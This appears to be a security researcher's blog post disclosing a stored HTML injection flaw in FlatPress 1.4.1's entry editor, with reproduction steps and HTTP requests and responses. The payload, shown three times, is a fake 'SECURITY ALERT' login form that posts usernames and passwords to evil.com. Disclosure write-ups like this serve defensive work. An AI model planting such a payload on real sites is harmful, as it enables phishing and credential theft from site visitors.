Sunday, 21 September 2025

Friday Fun Pentest Series - 41 - Stored HTML Injection - flatpressv1.4.1

Description

- It was noted that the application was vulnerable to Stored HTML Injection in the "Write Entry" functionality


Stored HTML Injection #1:

Steps to Reproduce:

- Login with admin user and visit "Main" > "New Entry" > "Write Entry" and in the description enter the payload below

[html]<div style="border:2px solid red;padding:20px;margin:20px;background:yellow"><h2>SECURITY ALERT</h2><p>Your account has been compromised. Please login again:</p><form action="https://evil.com/steal"><input type="text" placeholder="Username"><input type="password" placeholder="Password"><button>Login</button></form></div>[/html]


// HTTP POST Request

POST /FlatPressns3ufyfxkj/admin.php?p=entry&action=write HTTP/1.1
Host: demos5.softaculous.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
[...]

_wpnonce=ee76fd6c94&_wp_http_referer=/FlatPressns3ufyfxkj/admin.php?p=entry&action=write&date_hour=16&date_minute=12&date_second=51&date_month=09&date_day=21&date_year=2025&subject=HTMLi&timestamp=1758471158&entry=&attachselect=-- Selection --&imageselect=-- Selection --&content=[html]<div style="border:2px solid red;padding:20px;margin:20px;background:yellow"><h2>SECURITY ALERT</h2><p>Your account has been compromised. Please login again:</p><form action="https://evil.com/steal"><input type="text" placeholder="Username"><input type="password" placeholder="Password"><button>Login</button></form></div>[/html]&pl_file_meta=fp-content/content/seometa/default/metatags.ini&pl_description=&pl_keywords=&save=Publish


// HTTP Response

HTTP/1.1 302 Found
Date: Sun, 21 Sep 2025 16:12:55 GMT
Server: FlatPress
[...]


// HTTP GET Request

GET /FlatPressns3ufyfxkj/index.php/2025/09/21/htmli/ HTTP/1.1
Host: demos5.softaculous.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
[...]


// HTTP Response

HTTP/1.1 200 OK
Date: Sun, 21 Sep 2025 16:12:58 GMT
Server: FlatPress
[...]

[...]
<div itemprop="articleBody"><p><div style="border:2px solid red;padding:20px;margin:20px;background:yellow"><h2>SECURITY ALERT</h2><p>Your account has been compromised. Please login again:</p><form action="https://evil.com/steal"><input type="text" placeholder="Username"><input type="password" placeholder="Password"><button>Login</button></form></div></p></div>
[...]





at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Friday Fun Pentest Series - 42 - Current Password not Required when Changing Password - flatpressv1.4.1

Description - It was noted that the application did not require the current password for the password change functionality Current Password ...